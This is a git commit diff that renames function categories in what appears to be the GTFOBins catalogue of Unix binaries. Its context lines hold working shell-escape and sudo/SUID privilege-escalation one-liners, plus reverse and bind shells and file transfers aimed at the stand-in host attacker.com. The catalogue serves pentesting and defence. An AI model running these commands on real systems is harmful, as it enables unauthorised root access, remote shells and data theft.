Reorganize function names

Andrea Cardaci 2018-05-25 15:30:02 +02:00
parent 2d3ebbbb05
commit 36dcf7a836
40 changed files with 62 additions and 62 deletions


@ -1,9 +1,9 @@
exec-interactive:
label: Interactive
execute-interactive:
label: Interactive execute
description: It executes interactive commands that may be exploited to break out from restricted shells.
exec-non-interactive:
label: Non-interactive
execute-non-interactive:
label: Non-interactive execute
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
suid-enabled:
@ -26,18 +26,14 @@ upload:
label: Upload
description: It can exfiltrate files on the network.
bind-shell:
label: Bind shell
bind-shell-interactive:
label: Interactive bind shell
description: It can bind a shell to a local port to allow remote network access.
reverse-shell:
label: Reverse shell
reverse-shell-interactive:
label: Interactive reverse shell
description: It can send back a reverse shell to a listening attacker to open a remote network access.
load-library:
label: Library load
description: It loads shared libraries that may be used to run code in the binary execution context.
bind-shell-non-interactive:
label: Non-interactive bind shell
description: It can bind a non-interactive shell to a local port to allow remote network access.
@ -45,3 +41,7 @@ bind-shell-non-interactive:
reverse-shell-non-interactive:
label: Non-interactive reverse shell
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
load-library:
label: Library load
description: It loads shared libraries that may be used to run code in the binary execution context.


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: ash
sudo-enabled:
- code: sudo ash


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh")}'


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: bash
sudo-enabled:
- code: sudo bash
@ -34,7 +34,7 @@ functions:
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: csh
sudo-enabled:
- code: sudo csh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: dash
sudo-enabled:
- code: sudo dash


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
ed
!/bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: env /bin/sh
sudo-enabled:
- code: sudo env /bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: expect -c 'spawn /bin/sh;interact'
sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact'


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: find . -exec /bin/sh \; -quit
sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
ftp
!/bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: gdb -nx -ex '!sh' -ex quit
sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: ionice /bin/sh
sudo-enabled:
- code: sudo ionice /bin/sh


@ -7,7 +7,7 @@ description: |
/lib64/ld-linux-x86-64.so.2
```
functions:
exec-interactive:
execute-interactive:
- code: /lib/ld.so /bin/sh
sudo-enabled:
- code: sudo /lib/ld.so /bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
less /etc/profile
!/bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
man man
!/bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
TERM= more /etc/profile
!/bin/sh


@ -14,13 +14,13 @@ functions:
LPORT=12345
LFILE=where_to_save
nc -l -p $LPORT > "$LFILE"
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
bind-shell:
bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
sudo-enabled:
@ -9,7 +9,7 @@ functions:
suid-enabled:
- code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -20,7 +20,7 @@ functions:
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'
bind-shell:
bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345


@ -1,12 +1,12 @@
---
functions:
exec-interactive:
execute-interactive:
- code: perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com


@ -1,6 +1,6 @@
---
functions:
exec-non-interactive:
execute-non-interactive:
- code: |
export CMD="ls /"
php -r 'system(getenv("CMD"));'
@ -39,7 +39,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
@ -22,7 +22,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
reverse-shell:
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
export RHOST=attacker.com


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
@ -22,7 +22,7 @@ functions:
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
reverse-shell:
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
export RHOST=attacker.com


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: ruby -e 'exec "/bin/sh"'
sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"'
@ -9,7 +9,7 @@ functions:
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com


@ -1,6 +1,6 @@
---
functions:
exec-non-interactive:
execute-non-interactive:
- code: |
TF=$(mktemp)
CMD="id"


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: setarch $(arch) /bin/sh
sudo-enabled:
- code: sudo setarch $(arch) /bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
HOST=user@attacker.com
sftp $HOST


@ -1,12 +1,12 @@
---
functions:
reverse-shell:
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
bind-shell:
bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
code: |
LPORT=12345


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost /bin/bash --noprofile --norc
download:


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: strace -o /dev/null /bin/sh
sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: taskset 1 /bin/sh
sudo-enabled:
- code: sudo taskset 1 /bin/sh


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@ -8,7 +8,7 @@ functions:
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: vi -c ':!/bin/sh'
- code: |
vi


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr


@ -1,6 +1,6 @@
---
functions:
exec-interactive:
execute-interactive:
- code: zsh
sudo-enabled:
- code: sudo zsh